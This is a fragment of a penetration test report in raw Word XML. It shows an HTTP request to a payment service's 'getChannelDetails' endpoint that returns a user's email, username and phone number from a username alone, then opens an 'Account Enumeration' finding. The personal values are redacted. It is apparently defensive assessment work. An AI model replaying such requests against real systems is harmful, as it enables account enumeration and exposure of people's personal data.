                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>user":{"username":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>","firstName":"J</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>","lastName":"T</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>","phoneNumber":"3</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>,"authFlag":true}}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7235687F" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>getChannelDetails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05F6C16F" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request</w:t>
            </w:r>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w14:paraId="463CCE2B" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1273"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="66676503" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>getChannelDetails</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="279B0BF1" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0225ECF4" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="03FFFC4D" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0E7EB72C" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "WN</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>yY</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2E45C900" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="25BE1C8E" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response</w:t>
            </w:r>
            <w:r w:rsidRPr="006A09D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w14:paraId="1EDFE15A" w14:textId="77777777" w:rsidTr="004E4D83">
              <w:trPr>
                <w:trHeight w:val="1263"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="095A35FA" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="64D568BF" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Thu, 30 May 2019 17:57:19 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6A2058AD" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="75F6D743" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 125</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="19AD0D31" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="006A09D3" w:rsidRDefault="00A82FF7" w:rsidP="00A82FF7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>user":{"emailAddress":"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>","username":"W</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>Y","phoneNumber":"31</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>3","</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006A09D3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>authFlag":false}}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="287B4F42" w14:textId="77777777" w:rsidR="00A82FF7" w:rsidRPr="00AD0973" w:rsidRDefault="00A82FF7" w:rsidP="00793DD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1295D6A6" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1958559B" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="6CD8D0BB" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CC8354" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc10703669"/>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Medium-Risk Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="2909EACA" w14:textId="77777777" w:rsidTr="009208B5">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F79646"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13867A2E" w14:textId="45765475" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="MediumFindings"/>
            <w:bookmarkStart w:id="9" w:name="_Toc10703670"/>
            <w:r>
              <w:t>M1</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Account Enumeration</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B7238" w:rsidRPr="00397EF0" w14:paraId="4246D03C" w14:textId="77777777" w:rsidTr="002B7238">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C810412" w14:textId="77777777" w:rsidR="002B7238" w:rsidRPr="00397EF0" w:rsidRDefault="002B7238" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397EF0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
